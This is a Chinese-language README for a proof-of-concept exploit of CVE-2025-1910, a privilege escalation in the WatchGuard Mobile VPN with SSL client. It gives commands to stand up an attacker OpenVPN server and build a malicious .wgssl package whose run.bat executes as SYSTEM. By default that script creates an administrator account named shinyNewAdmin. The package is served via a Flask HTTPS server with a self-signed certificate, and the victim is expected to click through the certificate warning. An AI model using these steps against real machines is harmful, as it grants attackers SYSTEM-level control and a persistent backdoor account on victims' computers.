针对CVE-2025-1910的利用概念验证,这是一个Watchguard Mobile VPN with SSL客户端中的本地权限提升漏洞。
WatchGuard Mobile VPN with SSL 版本 <= 12.11.2 中存在一个权限提升漏洞,允许低权限用户在客户端上以 SYSTEM 身份执行命令。已在 Mobile VPN with SSL 版本 12.11.2 上测试。
sudo openvpn --config server.conf

修改 ./client/client.ovpn 中的 remote 选项,指向 OpenVPN 服务器。
根据需要修改 ./client/run.bat,该脚本将以 SYSTEM 权限执行。默认会创建一个新的管理员用户(shinyNewAdmin)。
创建恶意的 WatchGuard client.wgssl 文件:
cd client/
# 创建校验和
md5sum client.ovpn run.bat > MD5SUM
# 打包为 .wgssl 文件
tar -czf ../client_exploit.wgssl client.ovpn MD5SUM run.bat
cd ..
flask 提供恶意的 client.wgssl 文件:# 启动 flask HTTPS 服务器
sudo python3 srv.py

(可选)可以通过 openssl 创建新的证书和密钥对:
# 为 HTTPS 连接创建证书和私钥
openssl req -x509 -newkey rsa:4096 -nodes -out server.crt -keyout server.key -days 365 -subj "/CN=firebox"
然后在安装了存在漏洞版本的 Mobile VPN with SSL(例如版本 12.11.2,下载地址)的受害者机器上,尝试连接到攻击者的服务器。输入的用户名和密码无关紧要:

在安全警告上点击是,忽略证书警告:

连接成功建立后,run.bat 文件会被执行,并创建 shinyNewAdmin 用户:

需要在攻击服务器上安装 Python、openssl 和 openvpn。此外,还需要安装 flask Python 包:
pip install -r requirements.txt
如果已安装 Nix,可以直接启动开发 shell:
nix develop